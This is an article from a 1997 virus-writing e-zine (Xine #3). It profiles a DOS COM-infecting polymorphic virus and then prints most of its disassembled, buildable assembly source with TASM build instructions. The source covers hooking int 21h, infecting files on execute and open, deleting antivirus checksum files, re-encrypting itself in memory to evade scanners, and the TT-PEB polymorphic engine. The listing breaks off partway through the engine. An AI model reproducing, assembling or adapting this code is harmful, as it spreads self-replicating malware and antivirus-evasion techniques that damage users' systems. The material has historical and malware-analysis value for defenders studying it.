/-----------------------------\ | Xine - issue #3 - Phile 303 | \-----------------------------/ Virus spotlite: The Second NewBorn Trout by b0z0/iKX, Padania 1997 Virus Name : The Second NewBorn Trout Author : The Tricky Trout Origin : Milan (North Italy), 1995 AV Name : Trout-6804 (AVAST!), Trout2.6804 (AVP), Trout.6804 (DrWeb) Type : Direct action/TSR, Poly, COM infector, Retro Lenght : 6804 on disk (19967 in memory) Introduction: ÄÄÄÄÄÄÄÄÄÄÄÄÄ This is a quite old, but interesting virus from North Italy. Its main point of interest is undoubtely the good polymorphic engine that can generate a lot of different types of garbage instructions, including fake interrupt calls and quite long and complex decryptors, ranging at about 1kb-2kb. This should sound sorta normal nowadays, but for the past days in 1995 it was a great engine, maybe one of the best around as some AVers stated at the time. Virus description: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ As it is quite usual the virus will shrink the last MCB and place itself there. Of course it will then hook interrupt 21h, but instead of pointing from the IVT directly to the virus handler it will put in the IVT the adress to the first byte in the new virus segment in high memory. Here (while on the disk there are some garbage instructions, this is the 5 NOPs at the 1st gen) the virus will put a jump to the real virus interrupt 21h handler plus a word as marker. This is done to make the unhooking from the interrupt 21h chain easier. Infact when the virus notices some dangerous program is going to be started it will encrypt itself in memory and unhook from the interrupt chain. But more about this stealth feature later. Just after going resident TSNBT will turn into a direct action infector to be sure that the system will became infected. It will infact search for and infect 5 files in each of the search paths, starting from current directory on drive C:, then pointing directly to the file C:\DOS\KEYB.COM (quite usual on every DOS-like system. Of course this search won't be done 5 times ;) ), then scanning in the C:\DOS directory and finally scanning for COMs in the current directory. In this way the virus is quite sure that it has been sucesfully installed on the new system :-) At this point, when the installation in memory and on the disk are completed, the virus will return the control to the original host. After restoring the host data TSNBT will create a small routine on the stack and will pass the control to her. This routine will delete the virus from the memory after the host with zeros and then will pass the control to the host. In this way the virus isn't present anymore after the host in memory, sorta stealth :) While in memory the virus will check for quite a few int 21h functions. Infact on every execute (4b00h and 4b01h), open (3dh), extended open (6c00h), rename (56h) and filename parse to fcb (29h) it will check if the file can be infected (by comparing to the AV, system files and such like strings) and then will try to infect it. The infection stage is quite an usual COM infection stage, so nothing special to write :) When a file is executed before the infection an additional check is done. The virus will check if the program that is going to be run is an antivirus or a debugger. If so the virus, apart from not infecting the file, will encrypt itself in memory, unhook from the interrupt 21h chain (simply putting a jmp far to the old handler in the 5 bytes we talked about above), setup the stack so the return adress after the execution will point to the newly generated decryption code and setup a small routine on the stack that will delete the unencrypted copy of the virus and then pass the control to the next handler in the interrupt 21h chain. Then the virus will jump on the routine on the stack that, as said, will overwrite the unencrypted virus body, leaving of course the encrypted copy that will be stored higher in the memory block, and then execute the interrupt 21h funcion requested by the user (4b00h or 4b01h). In this way the antivirus or debugger that has been executed won't find the virus in the interrupt 21h chain and won't even be able to scan the memory for a simple scan string! Infact what is cool is that the virus isn't just encrypted with a standard loop but the poly engine TT-PEB that is used for the files is used for memory too, with some additional parameters of course. So detection in memory is quite hard, at least as hard as on disk. When the antivirus or debugger will finish it's work DOS will pass control to the CS:IP the virus pushed previsiously on the stack that points on the decryptor of the virus in memory. So the virus will decrypt and reinstall itself again in memory. Finally at every sucessfull infection the virus will delete some well known CRC files of the most common antiviruses. Poly engine description: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ As already said the poly engine, the "Tricky Trout Plurimorphic Encryptor Builder" (shortly TT-PEB) is very interesting. The version used here is the 2.01, but I don't know of other versions before this one. The TT-PEB is highly based on the use of tables. Infact for a lot of tasks, in the generation of the main decryption loop instructions, the TT-PEB selects the routine to be executed from a table containing adresses. The heart of this method is the procedure tbl2addr that given the adress of the table and the number of elements in it will return in AX a randomly choosen adress from the table. A JMP or a CALL to the AX value will then proceed to the generation of the selected code. This can be used of course also just to select an element in AX from the table and use it in another way :-) The assignation of the values to the register used as pointer, to the register used as counter and to the register used to hold the key of the decryptor is done in a random sequence. The assignation of the value can be done in three different ways: directly assigning the 16bit value to the register, by assigning first the low 8bits and later the high 8bits, by assigning first the high 8bits and then the low 8bits. Of course this is done when the selected register is suitable for doing that! The methods of encryption are the usual ones: XOR, ADD and SUB. Only 8bit math operation can be done. The operation can be done with an immediate value or using the key register, but this will have anyway a fixed value in the loop. The rest of the loop doens't offer many possible choices. There are three possible ways of checking if the counter came to zero (check check_counter) and a standard JZ+JMP construct with garbage in the middle to get back to the decryption loop. The garbage generation is interesting too. The garbage instructions are generated with something like a garbage compiler based on given garbage construction commands. The main garbage routine (garb_compiler) will infact examine byte by byte the pointed garbage construction command. The data in this construction commands should be interpreted as a command to execute or just as data to the previous command. It's not so simple to write :-) Let's see a schematic example: garb_cmd db X1-A, D1A, X2-B, D2A, D2B, X3-B, D3A, D3B, X4, END The Xn should be directives to execute some commands. The -A prefix means that one parameter is required, -B two parameters, no prefix no parameters. The Dnk are just data bytes that are required by the command before them. The garbage compiler will start reading from the first byte and execute the command X1-A (the adress in memory of the command is, again, calculated with a table). This will do something using the data D1A too (for example the X1-A should just store the D1A byte to the buffer where the decryptor is going to be done or store the D1A plus and additional word or something else). The X1-A will also update the pointer to the next instruction to be interpreted, this is X2-B. So then the X2-B, that will use two data bytes, will be executed, then the X3 that agains need two params and finally execute X4 that doesn't need extra data. In the TT-PEB itself the commands are represented by the garb_rrXX routines (XX from 00 to 32). The table that converts a command byte to the adress of the routine is the garb_routines table. Some commands are also called by other commands, not just directly from the garbage compiler. As you can see from the source (sorry, i'm not so lazy to comment one by one :) ) the garb_rrXX rotuines do various things, from just copying the data byte given on the given data byte (garb_rr00), or testing if a register (given as data byte) is already used for the main decryption loop (garb_rr2e), or testing if we are already in the decryptor loop (garb_rr32), or copy the given amount of data bytes to the decryptor space (garb_rr01, this takes the first data byte as the number of bytes to copy and the next bytes as data to be copyed) and so on. A command value of 0ffh means that the command has finished or it has to be stopped (for example if a test for a register has been negative). In my opinion this kind of garbage generator is very cool, extremely elegant and easy to extend. The only bad thing i can see is the space used: infact it should need too much space for some kind of construct, for example for the generation of one byte garbagers. The TT-PEB can generate a good variety of garbage instructions: math operations with registers and memory, operations with registers, comparations and the usual stuff. It is interesting that the poly also generates code to use (in math operations) or compare memory using registers as pointers and not just only immediate adresses (ex. mov ch,byte ptr ds:[bx+di] and such). There are also a few fake interrupt calls to both int 13h and 21h. A few more simple call and jump instructions are also included (see garb_cf0 to garb_cf5 in source, they are fully described there). Another interesting thing is that after the decryptor will be generated the poly will execute it from memory to encrypt the body of the virus. Of course the TT-PEB will put a RET instruction just after the end of the decryptor (encryptor) so it will be able to get control again. When the decryptor will finish to encrypt the body the TT-PEB will finally delete the RET used just in memory, will change the math operation that encrypted the body to its complementary for the decryption and will finally put the real value to the assignation of the pointer (since before it just put the assignation valid for execution in memory). The disasm: ÄÄÄÄÄÄÄÄÄÄÄ Here you have the entire disasm of the virus and of the TT-PEB. Some parts like the garbage generation routines aren't fully commented since they are quite simple to understand for the average poly coder. Also I left out many labels and a few comments from the first hand Sourcer pass. I am not so lazy to change every label just to hide the first pass :) Here comes the source! To get the original compile using TASM 3.0: TASM /m5 2trout.asm TLINK /t 2trout.obj Enjoy! ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ ;ÛÛ ÛÛ ;ÛÛ The Second NewBorn Trout ÛÛ ;ÛÛ Written by The Tricky Trout ÛÛ ;ÛÛ Milan, North Italy 1995 ÛÛ ;ÛÛ ÛÛ ;ÛÛ Disasm by b0z0/iKX ÛÛ ;ÛÛ Padania 1997 ÛÛ ;ÛÛ ÛÛ ;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ virus_length equ (offset tsnbt_fend - offset tsnbt_start) virus_mem equ (offset mem_end - offset tsnbt_start) seg_a segment byte public assume cs:seg_a, ds:seg_a org 100h tsnbt_start: nop nop nop nop nop tt_real_virus: sti cld pushf push ax call delta_offset delta_offset: mov si,01 cli xchg si,sp lodsw ; call adress in AX xchg sp,si sti sub ax,offset delta_offset ; calculate delta offset mov bp,ax ; delta offset in BP cmp byte ptr cs:[poly_in_mem + bp],0 mov byte ptr cs:[poly_in_mem + bp],0 jnz run_from_mem pop ax popf call restore_victim ; restore victim data call res_check jz already_resident call mem_signature call go_resident call infect_sys already_resident: ; here the virus creates a bounch of bytes of code on the stack that will ; overwrite the virus in memory (the one after the infected file, of course ; not the one resident in mem :) ) with zeros and then return the control ; to the host (this is CS:100h) sub bx,bx mov cx,0ffh mov dx,cs mov si,100h mov di,0fffeh mov ax,00h push ax ; push 00 mov ax,08cah ; push 0ca08 ('retf 8' with push ax ; the previous zeros) mov ax,595fh ; push 5f59h ('pop di', push ax ; 'pop cx') mov ax,0aaf3h ; push f3aah ('rep stosb') push ax cli mov word ptr ds:[jump_sp + bp],sp mov word ptr ds:[jump_ss + bp],ss sti ; store SS:SP for our jump ; on the stack push cs ; this will be the return push si ; adress push di push cx lea di,cs:[105h + bp] ; point on virus body mov cx,virus_length ; the rep stosb will delete sub ax,ax ; the virus in memory with sub bp,bp ; zeros (in mem after the COM) db 0eah ; jmp far on our code on the jump_sp dw 00h ; stack jump_ss dw 00h run_from_mem: ; if the virus is encrypted in memory after the decryptor it will rehook the ; int 21h and copy just it's decrypted body where on its place mov ax,cs mov ds,ax mov es,word ptr ds:[poly_segmem + bp] lea si,ss:[int21h_jump + bp] mov di,100h ; put again the virus int 21h mov cx,5 ; handler in the chain rep movsb lea si,ss:[105h + bp] mov cx,virus_length ; reput virus to it's place rep movsb ; in memory pop ax ; pop exec return stuff popf pop bp ; correct stack from the pop es ; work before pop ds pop di pop si pop dx pop cx pop bx retf 2 ; go on :) restore_victim: lea si,ss:[orig_bytes + bp] ; point on victim saved data mov di,100h mov cx,5 rep movsb ; restore the 5 bytes retn res_check: mov ax,6353h ; residency check call mov cl,0 int 21h cmp ax,3254h ; set flags and set ds=cs mov ax,cs mov ds,ax retn mem_signature: push ds sub ax,ax mov ds,ax ; set a virus marker in memory mov word ptr ds:[20ch],'XV' pop ds retn go_resident: push ds push es mov ax,cs sub ax,1 mov ds,ax ; on mcb cmp byte ptr ds:[0],'Z' ; last mcb? je is_our_last jmp short bad_memory is_our_last: mov ax,virus_mem ; needed memory mov cl,4 shr ax,cl ; convert to paras add ax,1 mov dx,word ptr ds:[3] sub dx,ax mov word ptr ds:[3],dx ; shrink for virus sub bx,bx mov es,bx shr ax,cl shr cl,1 shr ax,cl ; convert to kbs add ax,1 sub word ptr es:[413h],ax ; lower system memory mov ax,cs add dx,ax sub dx,10h ; calculate virus segment mov es,dx cli sub ax,ax mov ds,ax mov ax,100h ; BX:AX point to the jump mov bx,es ; to the int 21h handler xchg ds:[21h * 4],ax ; hook int21h xchg ds:[21h * 4 + 2],bx mov cs:[orig_int21h + bp],ax mov word ptr cs:[orig_int21h+2 + bp],bx mov word ptr cs:[int24_off + bp],offset int24h_handler mov word ptr cs:[int24_seg + bp],es ; initialize int24h adress mov ax,cs mov ds,ax lea si,ss:[int21h_jump + bp] mov di,100h mov cx,5 ; copy the jump to int 21h rep movsb ; handler lea si,ss:[105h + bp] mov cx,virus_length ; copy virus to memory rep movsb sti bad_memory: pop es pop ds retn infect_sys: ; when the virus goes resident it will search for some files to infect that ; are usually on every system (look at the string later in the source). this ; of course is a good idea to implant the virus in the system. push ds mov ah,2Fh ; get dta int 21h push bx push es mov ah,1Ah ; set dta lea dx,ss:[offset mem_buff + bp] ; dta to our free mem int 21h lea dx,cs:[fastfile1 + bp] ; fastly infect some call fast_infect ; files on the system lea dx,cs:[fastfile2 + bp] call fast_infect lea dx,cs:[fastfile3 + bp] call fast_infect lea dx,cs:[fastfile4 + bp] call fast_infect pop ds pop dx mov ah,1ah ; set original dta int 21h pop ds retn fast_infect: mov byte ptr ds:[fast_cntr + bp],0 ; initialize counter mov ah,4Eh ; findfirst mov cx,3 do_find_fn: int 21h jc end_fast_inf ; carry = finished mov si,dx lea di,ss:[buff_2 + bp] loc_11: mov al,[si] cmp al,'*' ; wildcard search? je loc_12 mov [di],al cmp al,0 ; end of name je loc_14 add si,1 add di,1 jmp short loc_11 loc_12: lea si,ss:[buff_1 + bp] loc_13: mov al,[si] mov [di],al add si,1 add di,1 cmp al,0 jne loc_13 loc_14: push dx mov ax,6353h ; virus internal function mov cl,1 ; to infect a file lea dx,cs:[1BC9h + bp] int 21h pop dx mov ax,cs mov ds,ax jc loc_15 ; carry no infection, so ; don't update counter add byte ptr ds:[fast_cntr + bp],1 cmp byte ptr ds:[fast_cntr + bp],5 je end_fast_inf ; already 5 infected files? loc_15: mov ah,4fh ; set AH for findnext call jmp short do_find_fn end_fast_inf: retn int21h_handler: ; Interrupt 21h handler cmp ax,4b00h ; execute je exec_on21 cmp ax,4b01h ; execute je exec_on21 cmp ah,3dh ; open je open_on21 cmp ax,6c00h ; extended open je eope_on21 cmp ah,56h ; rename je open_on21 cmp ah,29h ; parse filename into fcb je eope_on21 cmp ax,6353h ; residency and internal je resi_on21 ; virus stuff chain_on21: jmp dword ptr cs:[orig_int21h] exec_on21: call filenmav_chk jnc no_av1 jmp av_executed no_av1: call filename_chk jc bad_name1 call infect_file bad_name1: jmp short chain_on21 open_on21: call filename_chk jc bad_name2 call infect_file bad_name2: jmp short chain_on21 eope_on21: push dx mov dx,si call filename_chk jc bad_name3 call infect_file bad_name3: pop dx jmp short chain_on21 resi_on21: cmp cl,0 je just_residency_check cmp cl,1 je infect_it iret just_residency_check: mov ax,3254h iret ; Interrupt return infect_it: call filename_chk jc loc_ret_28 mov byte ptr cs:[good_inf],0 call infect_file cmp byte ptr cs:[good_inf],1 loc_ret_28: retf 2 filename_chk: ; ok exit without carry, bad exit with carry. Bad exit if: ; 1) the extension isn't COM ; 2) the file is an OS file ; 3) file is an AV call push_all mov si,dx nnn_loop: cmp byte ptr [si],0 ; end of the string? je end_string cmp byte ptr [si],'.' je got_dotext add si,1 jmp short nnn_loop got_dotext: add si,1 push dx mov dx,si mov di,offset com_suffix call cmpre_names ; check if the extension ; is COM pop dx jc ok_extcom ; extension is ok end_string: stc jmp short exit_cmp1 ok_extcom: mov di,offset os_files ; check if os file call cmpre_names jc exit_cmp1 ; carry = sysfile, leave it mov di,offset av_names ; check if av call cmpre_names exit_cmp1: call pop_all retn filenmav_chk: ; check if the filename is an antivirus. carry if it is call push_all mov di,offset av_names call cmpre_names call pop_all retn cmpre_names: ; DS:DX = pointer on path to file to check ; CS:DI = pointer on string (or strings) to compare the filename to mov si,dx loop_change: mov bx,si ; pointer on filename in BX path_loop: cmp byte ptr [si],0 ; end of filename je end_path_loop cmp byte ptr [si],'\' je delimitator cmp byte ptr [si],':' je delimitator add si,1 jmp short path_loop delimitator: add si,1 jmp short loop_change ; set filename starting ; point end_path_loop: mov cl,0 mov si,bx ; SI pointer on filename cmp byte ptr cs:[di],0 ; end of string? jne check_string clc ; no carry, name is ok retn check_string: mov al,byte ptr ds:[si] ; AL = filename char mov ah,byte ptr cs:[di] ; AH = compared char or al,20h ; convert to lowercase or ah,20h cmp al,ah je char_match mov cl,1 ; cl=1, name differs char_match: add si,1 ; both to next char add di,1 cmp ah,'.' ; end of name to check? je founded_dot cmp ah,20h jne check_string founded_dot: cmp cl,1 ; if cl=1 at least one ; char differs je end_path_loop stc ; carry, ok name retn loc_41: jmp loc_45 jmp loc_43 loc_42: jmp loc_44 infect_file: mov word ptr cs:[finf_name],dx mov word ptr cs:[finf_name+2],ds call push_all call handler_24 call get_attrib jc loc_41 mov word ptr ds:[orig_att],cx ; save attribs call open_ro jc loc_41 call get_time mov word ptr ds:[f_time],cx ; save file time and date mov word ptr ds:[f_date],dx mov cx,5 mov dx,offset orig_bytes ; read 5 bytes from head call read_file cmp ax,cx ; check if readed 5 bytes jne loc_42 cmp word ptr ds:[orig_bytes],'ZM' ; exe? je loc_42 cmp word ptr ds:[orig_bytes],'MZ' ; exe? je loc_42 cmp word ptr ds:[orig_bytes+3],'T2' ; already infected? je loc_42 call lseek_fend ; get file lenght cmp dx,0 jne loc_42 cmp ax,0e000h jae loc_42 ; Jump if above or = cmp ax,5 jb loc_42 ; Jump if below mov ds:[f_length],ax call close_file sub cx,cx call set_attrib ; delete attributes jc loc_41 call open_rw ; open in RW mode now jc loc_41 call lseek_fend mov byte ptr [good_inf],1 push ds push es mov ax,cs mov dx,offset mem_buff ; mem for poly use mov cl,4 shr dx,cl add dx,1 add ax,dx mov es,ax mov dx,offset tt_real_virus ; set poly params mov cx,virus_length mov bp,word ptr ds:[f_length] add bp,100h sub si,si mov ax,6 call ttpeb ; call poly engine call write_file pop es pop ds call lseek_fsta mov ax,ds:[f_length] sub ax,3 mov byte ptr [orig_bytes],0e9h ; jump to virus mov word ptr [orig_bytes+1],ax mov word ptr ds:[orig_bytes+3],'T2' ; marker mov cx,5 mov dx,offset orig_bytes ; write new head call write_file mov cx,word ptr ds:[f_time] mov dx,ds:[f_date] call set_time ; set orig time call close_file ; close file mov cx,word ptr ds:[orig_att] call set_attrib ; set orig attribs call delete_crcs jmp short loc_45 loc_43: call close_file mov cx,word ptr ds:[orig_att] call set_attrib jmp short loc_45 loc_44: call close_file jmp short loc_45 loc_45: call handler_24 call pop_all retn get_attrib: mov al,0 jmp short do_attrib set_attrib: mov al,1 jmp short do_attrib do_attrib: lds dx,dword ptr cs:[finf_name] mov ah,43h ; chmod call orig_int21 mov ax,cs mov ds,ax retn open_ro: mov al,0 jmp short do_open open_rw: mov al,2 jmp short do_open do_open: lds dx,dword ptr cs:[finf_name] mov ah,3Dh ; open file call orig_int21 xchg bx,ax ; handle in bx mov ax,cs mov ds,ax retn get_time: mov al,0 jmp short do_time set_time: mov al,1 jmp short do_time do_time: mov ah,57h ; set/get file date/time call orig_int21 retn lseek_fsta: mov al,0 jmp short lseek lseek_fend: mov al,2 ; lseek from end jmp short lseek lseek: sub cx,cx sub dx,dx mov ah,42h ; lseek call orig_int21 retn read_file: mov ah,3fh ; read from file call orig_int21 retn write_file: mov ah,40h ; write to file call orig_int21 retn close_file: mov ah,3Eh ; close file call orig_int21 retn delete_crcs: ; deletes checksum files and such things mov dx,offset crc_files loc_50: mov di,offset mem_buff lds si,dword ptr cs:[finf_name] push si mov si,dx cmp byte ptr cs:[si],'\' pop si jnz loc_52 cmp byte ptr [si+1],':' jne loc_51 mov ax,word ptr ds:[si] mov word ptr cs:[di],ax add si,2 add di,2 loc_51: jmp short loc_56 loc_52: mov al,byte ptr ds:[si] ; copy file name mov byte ptr cs:[di],al add si,1 add di,1 cmp al,0 jne loc_52 mov si,offset mem_buff loc_53: mov di,si loc_54: cmp byte ptr cs:[si],':' je loc_55 cmp byte ptr cs:[si],'\' je loc_55 cmp byte ptr cs:[si],0 je loc_56 add si,1 jmp short loc_54 loc_55: add si,1 jmp short loc_53 loc_56: mov si,dx loc_57: mov al,byte ptr cs:[si] mov byte ptr cs:[di],al add si,1 add di,1 cmp al,0 jne loc_57 mov ax,cs mov ds,ax push dx mov ax,4301h ; delete file attributes sub cx,cx mov dx,offset mem_buff call orig_int21 mov ah,41h ; delete file mov dx,offset mem_buff call orig_int21 pop dx mov si,dx loc_58: cmp byte ptr [si],0 je loc_59 add si,1 jmp short loc_58 loc_59: add si,1 cmp byte ptr [si],0 ; two zeros means end je loc_ret_60 mov dx,si jmp loc_50 loc_ret_60: retn handler_24: push ds ; install/uninstall virus sub ax,ax ; int24h handler mov ds,ax mov ax,cs:[int24_off] mov bx,cs:[int24_seg] xchg ds:[24h * 4],ax xchg ds:[24h * 4 + 2],bx mov cs:[int24_off],ax mov cs:[int24_seg],bx pop ds retn orig_int21: pushf ; do a call to original 21h call dword ptr cs:[orig_int21h] retn push_all: pop word ptr cs:[return_addr] push ax push bx push cx push dx push si push di push ds push es push bp jmp word ptr cs:[return_addr] pop_all: pop word ptr cs:[return_addr] pop bp pop es pop ds pop di pop si pop dx pop cx pop bx pop ax jmp word ptr cs:[return_addr] return_addr db 0ah,04h ; temp stuff int24h_handler: mov al,3 iret av_executed: ; if a known antivirus (from the latter strings) is going to be run the virus ; will reput the old int21h handler in the chain. then the virus will ; encrypt itself (poly encryption using TT-PEB) in memory. using a small ; routine on the stack the virus will then erase its clean copy from the ; memory (leaving just the encrypted one) and jump far to the original ; int 21h routine that will execute the antivirus. at the return from the ; exec routine, cs:ip will be set to the poly decryptor generated in memory ; (since the virus will push on the stack also the cs:ip of that) and so ; the virus will be able again to get power pushf call push_all mov byte ptr cs:[poly_in_mem],1 mov word ptr cs:[poly_segmem],cs mov byte ptr cs:[100h],0eah mov ax,word ptr cs:[orig_int21h] mov bx,word ptr cs:[orig_int21h+2] mov word ptr cs:[101h],ax ; restore old int21h mov word ptr cs:[103h],bx mov ax,cs mov dx,offset mem_buff mov cl,4 shr dx,cl ; mem for poly add ax,dx add ax,1 mov es,ax mov ax,cs mov ds,ax mov dx,105h ; poly params mov cx,virus_length sub bp,bp sub si,si mov ax,0Fh call ttpeb ; call poly mov cs:[encvir_dx],dx ; save seg:off of the mov cs:[encvir_ds],ds ; encrypted body in mem call pop_all popf push bx push cx push dx push si push di push ds push es push bp pushf push cs:[encvir_ds] ; where int 21h will return push cs:[encvir_dx] ; after the execution of the ; antivirus mov cx,6 push cx mov cx,0ca07h ; push 'retf 6' push cx ; and 'pop es' mov cx,0aaf3h push cx ; push 'rep stosb' cli mov word ptr cs:[jump_sp2],sp mov word ptr cs:[jump_ss2],ss sti push word ptr cs:[orig_int21h+2] ; where will the push word ptr cs:[orig_int21h] ; ret jump push es mov cx,cs mov es,cx mov di,105h ; point on virus body in high mov cx,virus_length ; memory db 0eah ; jmp far to the created jump_sp2 dw 00h ; routine on the stack that jump_ss2 dw 00h ; will delete the clear body ; from memory and then execute ; the int 21h ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß ; ; TT-PEB (Tricky Trout Plurimorphic Encryptor Builder) v 2.01 ; ; ; Entry parameters: ; AX = The low 4 bits are used as parameters to the poly: ; 1 bit: 1 force CS on decrypt operation (0 no CS:) ; [0 for files, 1 when body run in mem] ; 2 bit: 1 create garbage (0 no garbage) ; 3 bit: 1 create more garbage (0 less garbage) ; 4 bit: 1 create code to save (and restore at end) ; the AX register and the flags (this is do ; a push ax and pushf) ; [1 needed when body run in mem, since it is ; needed to preserve the return stuff] ; BP = Offset at which the code will run ; CX = Length of code to be encrypted ; DS:DX = Pointer on code to be encrypted ; ES:SI = Pointer on temp space for poly use ; ; On exit: ; AX = CX on entry ; CX = Length of generated code ; DS:DX = Pointer on generated code ; ;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ poly_marker db '[TT-PEB]' ttpeb: cli ; store SS and SP mov word ptr cs:[tt_saved_sp],sp mov word ptr cs:[tt_saved_ss],ss mov sp,cs ; set stack to our mov ss,sp ; memory mov sp,offset tt_stack sti push bx push si push bp ; save some parameters mov word ptr cs:[tt_saved_dx],dx mov word ptr cs:[tt_saved_ds],ds mov word ptr cs:[tt_saved_cx],cx mov word ptr cs:[tt_saved_bp],bp mov word ptr cs:[tt_saved_si],si mov word ptr cs:[tt_saved_ax],ax mov ax,cs mov ds,ax poly_init: mov byte ptr [pntr_reg],0ffh ; initialize all mov byte ptr [cntr_reg],0ffh ; poly variables and mov byte ptr [oper_reg],0ffh ; such mov byte ptr [pntr_chdone],0ffh mov byte ptr [cntr_chdone],0ffh mov word ptr [rnd_pos],0ffffh mov byte ptr [spec_cnst],0ffh mov byte ptr [some_lock],0ffh mov byte ptr [decr_init],0ffh ; here the TT-PEB will create a table with offsets to garbage constructs ; (offsets are from the garbage_offsets table) to be used in garbage ; generation in the entire poly process mov si,offset garbage_offsets mov di,2 do_mem_tbl: call get_random ; how many times will this and al,3 ; adress figure out? cbw mov cx,ax mov ax,word ptr [si] ; get adress cmp ax,0 ; AX=00 if garbage_offsets je mem_tbl_end ; table ended cmp cx,0 je cx_zero rep stosw cx_zero: add si,2 ; go to next entry in g_off jmp short do_mem_tbl ; table mem_tbl_end: sub di,2 shr di,1 mov es:[0],di ; nr of garbage adresses mov ax,es add ax,40h mov es,ax ; where the decryptor sub di,di ; will be created mov ax,[tt_saved_ax] and ax,8 ; need to preserve AX and F? cmp ax,0 je no_saveaxf call get_random and al,2 ; two ways to do it cmp al,0 je loc_66 mov ax,509ch ; 'pushf' 'push ax' stosw mov ax,9d58h ; 'pop ax' 'popf' for later jmp short loc_67 loc_66: mov ax,9c50h ; 'push ax' 'pushf' stosw mov ax,589dh ; 'popf' 'pop ax' loc_67: push ax ; will store at the end of ; the decryptor no_saveaxf: mov ax,[tt_saved_ax] and ax,4 ; more or less garbage cmp ax,0 je not_toogarby call garb_cntr call garb_cntr ; garbageeeeee :) call garb_cntr call garb_cntr not_toogarby: call regs_set ; set one reg (cnt/pnt/op) call garb_cntr call garb_cntr call regs_set ; set another reg call garb_cntr call garb_cntr call regs_set ; set remaining reg call garb_cntr call garb_cntr mov [dec_loop_start],di ; save offset where will mov byte ptr [decr_init],0 ; decryptor jump to call garb_cntr call garb_cntr call math_oper ; math oper on mem call garb_cntr call garb_cntr call incdec_pntcnt ; pnt/cnt update call garb_cntr call garb_cntr call incdec_pntcnt ; remaining pnt/cnt update call garb_cntr call garb_cntr call check_counter ; check on counter creation call make_cond_jump ; conditional jump for end call jump_back ; long jump back to start of ; decryptor mov byte ptr [decr_init],0ffh mov byte ptr [pntr_reg],0ffh ; reset reg uses mov byte ptr [cntr_reg],0ffh mov byte ptr [oper_reg],0ffh mov ax,[tt_saved_ax] and ax,4 cmp ax,0 je not_toogarby2 call garb_cntr call garb_cntr not_toogarby2: mov ax,[tt_saved_ax] and ax,8 ; need to preserve AX and F? cmp ax,0 je loc_71 pop ax ; get the pops from stack stosw ; and store them loc_71: mov al,0cbh ; store the retf stosb mov [encr_pnt],di ; save its position push es mov ax,es sub ax,40h mov es,ax sub di,di mov cx,400h ; clear generation tables mov al,0 rep stosb pop es mov si,[pntr_pos] mov ax,[encr_pnt] ; set pointer assignment mov es:[si+1],ax ; in decryptor (the memory ; one! the definitive that ; will be run will be put ; later push ds lds si,dword ptr [tt_saved_dx] mov di,ds:[encr_pnt] mov cx,cs:[tt_saved_cx] rep movsb ; copy virus body after generated ; code pop ds mov ax,es mov ds,ax mov ax,offset return_ply push cs ; push return adress on the stack push ax sub ax,ax push es push ax retf ; jump on encryptor return_ply: ; returning point after the encryptor ; (hehe, decryptor :) ) has been ; executed sti cld mov ax,cs mov ds,ax mov si,[mate_pos] mov al,[math_oc] mov es:[si],al ; set the inverse math operation in ; the decryptor mov di,[encr_pnt] mov byte ptr es:[di-1],90h ; put a NOP where the RET ; was mov si,[pntr_pos] mov ax,[encr_pnt] add ax,[tt_saved_bp] add ax,[tt_saved_si] ; put starting value for mov es:[si+1],ax ; memory pointer register ; in the decryptor push ds lds si,dword ptr cs:[tt_saved_dx] mov di,cs:[encr_pnt] mov cx,10h add si,cx add di,cx repe cmpsb ; check that body is encrypted pop ds jnz body_encrypted mov ax,es sub ax,40h ; if not start again mov es,ax jmp poly_init body_encrypted: sub dx,dx mov ax,es mov ds,ax sub ax,40h mov es,ax mov cx,cs:[encr_pnt] ; set return values add cx,cs:[tt_saved_cx] mov di,cs:[encr_pnt] mov ax,cs:[tt_saved_cx] pop bp pop si pop bx cli ; restore original SS:SP mov sp,word ptr cs:[tt_saved_sp] mov ss,word ptr cs:[tt_saved_ss] sti retn ; TT-PEB ending point ;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß regs_set: ; ; regs_set creates the inital assignments to the counter (tbl1_b), ; pointer (tbl1_a) and math operation register (tbl1_c). of course it ; first check it hasn't been done yet. ; mov ax,3 mov bx,offset table_1 call tbl2addr jmp ax table_1: dw offset tbl1_a dw offset tbl1_b dw offset tbl1_c tbl1_a: cmp byte ptr [pntr_reg],0FFh jne regs_set jmp short pntr_crea tbl1_b: cmp byte ptr [cntr_reg],0FFh jne regs_set jmp short cntr_crea tbl1_c: cmp byte ptr [oper_reg],0FFh jne regs_set jmp loc_81 incdec_pntcnt: ; ; this routine: ; 1) decrements the counter reg (tbl2_b) ; 2) increments the pointer reg (tbl2_a) ; of course it first checks that it hasn't been yet done ; mov ax,2 mov bx,offset table_2 call tbl2addr jmp ax ;*Register jump table_2: dw offset tbl2_a dw offset tbl2_b tbl2_a: cmp byte ptr [pntr_chdone],0ffh jnz incdec_pntcnt jmp pntr_update tbl2_b: cmp byte ptr [cntr_chdone],0ffh jne incdec_pntcnt jmp cntr_update ; pntr_crea creates the MOV pointer,offset_on_encr_code (offset is set near ; the end of the poly generation) pntr_crea: mov [pntr_pos],di pntr_select: mov ax,3 mov bx,offset table_3 ; which reg to use as pntr call tbl2addr cmp byte ptr [cntr_reg],al je pntr_select mov ah,byte ptr [oper_reg] ; be sure it isn't already and ah,0fbh ; used cmp al,ah je pntr_select mov [pntr_reg],al or al,0b8h ; mov opcode stosb add di,2 